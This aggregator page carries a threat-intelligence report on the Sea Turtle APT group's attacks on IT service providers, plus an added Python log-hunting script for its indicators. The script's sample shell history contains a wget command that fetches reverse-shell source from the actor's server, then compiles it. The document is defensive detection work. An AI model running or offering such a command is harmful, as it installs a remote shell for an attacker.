A Brazilian threat actor is targeting more than 30 Portuguese financial institutions with information-stealing malware as part of a long-running campaign that commenced in 2021.
“The attackers can steal credentials and exfiltrate users’ data and personal information, which can be leveraged for malicious activities beyond financial gain,” SentinelOne researchers Aleksandar Milenkoski and Tom
Related Posts
IMF Emails Hacked
The International Monetary Fund (IMF) detects a cybersecurity incident that involved nearly a dozen email accounts getting hacked.
The post IMF Emails Hacked appeared first on SecurityWeek.
SecurityWeek RSS Feed
Sea Turtle APT Group Exploiting Known Vulnerabilities to Attack IT-service Providers
To gain access to many clients’ systems and data in a single operation, attackers frequently target IT service providers.
Compromising one provider lets them maximize the effect of their effort, reaching several organizations from a single point of entry.
Cybersecurity researchers at Hunt & Hackett recently discovered that Sea Turtle, a Turkish espionage APT group, has been actively exploiting known vulnerabilities to attack IT service providers.
Sea Turtle APT Group
Sea Turtle has been active since 2017 and is best known for DNS hijacking; it adapts its tradecraft to evade detection.
Microsoft publicly reported on the group (which it tracks as SILICON) in October 2021, noting that its activity aligns with Turkish interests. In 2022, the Greek National CERT shared indicators of compromise (IOCs) for the group.
Sea Turtle targets organizations in the following regions for sensitive data:-
Europe
Middle East
North Africa
The sectors and entities targeted:-
Gov’t bodies
Kurdish groups
NGOs
Telecom
ISPs
IT
Media
Successful attacks support surveillance and intelligence gathering. Sea Turtle intercepts internet traffic (its DNS hijacking) and uses a reverse shell on compromised hosts for data extraction.
Researchers also tracked Sea Turtle campaigns in the Netherlands and found them primarily focused on the following two things in service of Turkish interests:-
Economic espionage
Political espionage
Recent campaigns in the Netherlands target the following:-
Telecom
Media
ISPs
Kurdish websites
Sea Turtle uses supply chain attacks, compromising providers to reach their customers, to collect politically sensitive information. The stolen data is likely used for surveillance of, or intelligence on, specific groups.
In early 2023, Hunt & Hackett identified Sea Turtle’s latest campaigns against multiple organizations. In one intrusion, the threat actor compromised a cPanel account and connected through a VPN.
They created a webmail session and then performed SSH logons from an IP address belonging to a hosting provider. Source code for a reverse shell written in C was downloaded from a GitHub repository known to belong to Sea Turtle and compiled on the host.
PwC independently linked this activity to Sea Turtle’s SnappyTCP reverse shell; here, SnappyTCP was downloaded from a Sea Turtle server (http[://]193.34.167[.]245/c00n/connn.c).
The actor then established a command-and-control channel, applied anti-forensic measures, and later reconnected to the compromised cPanel account.
When specific conditions are met, the SnappyTCP malware does the following:-
Reads a config file
Performs an HTTP GET with ‘sy.php’ request URI
Spawns a reverse shell
The C&C channel likely uses Socat, which matches the characteristics observed on the server.
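The following Python is an added example, not tooling from the article, Hunt & Hackett or PwC. It hunts for the three observables the page describes: an HTTP GET for the ‘sy.php’ request URI, a fetch of the reverse-shell source from 193.34.167.245, and accepted SSH logins from a hosting-provider address range. The log lines, host names, user names and the 203.0.113.0/24 “hosting provider” range are constructed sample data; hosting_cidrs is an assumed input you would populate from your own allow/deny lists.

```python
"""Hunt for the SnappyTCP / Sea Turtle indicators described above.

Added example; not Hunt & Hackett's, PwC's or the article's tooling. The only
indicators taken from the article are the 'sy.php' request URI and the download
host 193.34.167.245. All log lines and the hosting range are constructed.
"""
import ipaddress
import re
from dataclasses import dataclass

SEA_TURTLE_DOWNLOAD_HOST = "193.34.167.245"  # from the article (defanged there)
SNAPPYTCP_BEACON_URI = "sy.php"              # request URI named in the article

# Combined log format (Apache/nginx access log, or an egress proxy):
# ip ident user [time] "METHOD uri PROTO" status bytes "referer" "agent"
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+)[^"]*" (?P<status>\d{3}) \S+'
)
# OpenSSH accepted-login line as written to auth.log / the journal.
SSH_ACCEPT_RE = re.compile(
    r'sshd\[\d+\]: Accepted (?P<auth>\w+) for (?P<user>\S+) '
    r'from (?P<ip>\S+) port \d+'
)


@dataclass(frozen=True)
class Finding:
    rule: str
    indicator: str
    line: str


def check_http_log(lines):
    """SnappyTCP's HTTP GET beacon. The page does not say which end writes the
    log, so run this over whatever HTTP request log you have (egress proxy or
    web server access log). Matching the request basename, not a substring,
    keeps /easy.php from being flagged while /c00n/sy.php?id=1 is."""
    findings = []
    for line in lines:
        m = ACCESS_RE.match(line)
        if not m or m.group("method") != "GET":
            continue
        path = m.group("uri").split("?", 1)[0]
        if path.rsplit("/", 1)[-1] == SNAPPYTCP_BEACON_URI:
            findings.append(Finding("snappytcp_beacon_uri", m.group("uri"), line))
    return findings


def check_download_host(lines):
    """Shell history, proxy logs or process command lines that reference the
    server the reverse-shell source (connn.c) was fetched from."""
    return [Finding("sea_turtle_download_host", SEA_TURTLE_DOWNLOAD_HOST, line)
            for line in lines if SEA_TURTLE_DOWNLOAD_HOST in line]


def check_ssh_logins(lines, hosting_cidrs):
    """Accepted SSH logins from hosting-provider ranges (the article's 'SSH
    logons from a hosting provider's IP'). hosting_cidrs is an assumed input."""
    nets = [ipaddress.ip_network(c) for c in hosting_cidrs]
    findings = []
    for line in lines:
        m = SSH_ACCEPT_RE.search(line)
        if not m:
            continue
        addr = ipaddress.ip_address(m.group("ip"))
        if any(addr in net for net in nets):
            findings.append(Finding("ssh_login_from_hosting_range",
                                    f"{m.group('user')}@{m.group('ip')}", line))
    return findings


def hunt(http_lines, command_lines, auth_lines, hosting_cidrs):
    """Run all three checks; the set of distinct rules that fired is the triage
    signal (any one rule alone is weak, the chain together is the TTP)."""
    findings = (check_http_log(http_lines)
                + check_download_host(command_lines)
                + check_ssh_logins(auth_lines, hosting_cidrs))
    return findings, {f.rule for f in findings}


# Constructed sample data (RFC 5737 documentation addresses; not real logs).
SAMPLE_HTTP_LOG = [
    '198.51.100.7 - - [12/Jan/2024:10:15:01 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [12/Jan/2024:10:15:40 +0000] "GET /easy.php HTTP/1.1" 200 88 "-" "Mozilla/5.0"',
    '203.0.113.45 - - [12/Jan/2024:10:16:22 +0000] "GET /c00n/sy.php?id=1 HTTP/1.1" 200 31 "-" "curl/8.0"',
]
SAMPLE_SHELL_HISTORY = [
    "wget http://193.34.167.245/c00n/connn.c -O /tmp/connn.c",
    "gcc /tmp/connn.c -o /tmp/.c",
    "ls -la /var/www",
]
SAMPLE_AUTH_LOG = [
    "Jan 12 10:20:31 web1 sshd[2211]: Accepted password for cpaneluser from 203.0.113.45 port 51122 ssh2",
    "Jan 12 10:21:00 web1 sshd[2230]: Accepted publickey for admin from 192.0.2.10 port 50020 ssh2",
]
SAMPLE_HOSTING_CIDRS = ["203.0.113.0/24"]

if __name__ == "__main__":
    found, rules = hunt(SAMPLE_HTTP_LOG, SAMPLE_SHELL_HISTORY, SAMPLE_AUTH_LOG, SAMPLE_HOSTING_CIDRS)
    for f in found:
        print(f"[{f.rule}] {f.indicator}")
    print("rules fired:", sorted(rules))
```

On the sample data all three rules fire and /easy.php and the admin login from 192.0.2.10 stay quiet. In production, feed check_http_log your egress proxy or web access logs, check_download_host your collected shell histories or EDR process command lines, and check_ssh_logins the SSH accepted-login events from the central log store the recommendations below call for.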
Recommendations
The recommendations provided by the analysts:-
Deploy EDR for monitoring network connections, processes, and account activity; store logs centrally.
Enforce a strong password policy.
Store credentials and other secrets in a secrets management system.
Limit logon attempts.
Enable 2FA on external accounts.
Keep software updated to minimize vulnerabilities.
Restrict SSH access.
Implement SSH logon rate limiting.
Implement egress network filtering to block malicious traffic.
The post Sea Turtle APT Group Exploiting Known Vulnerabilities to Attack IT-service Providers appeared first on Cyber Security News.
Cyber Security News
CISA says Sisense hack impacts critical infrastructure orgs
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) is investigating the recent breach of data analytics company Sisense, an incident that also impacted critical infrastructure organizations. […]
BleepingComputer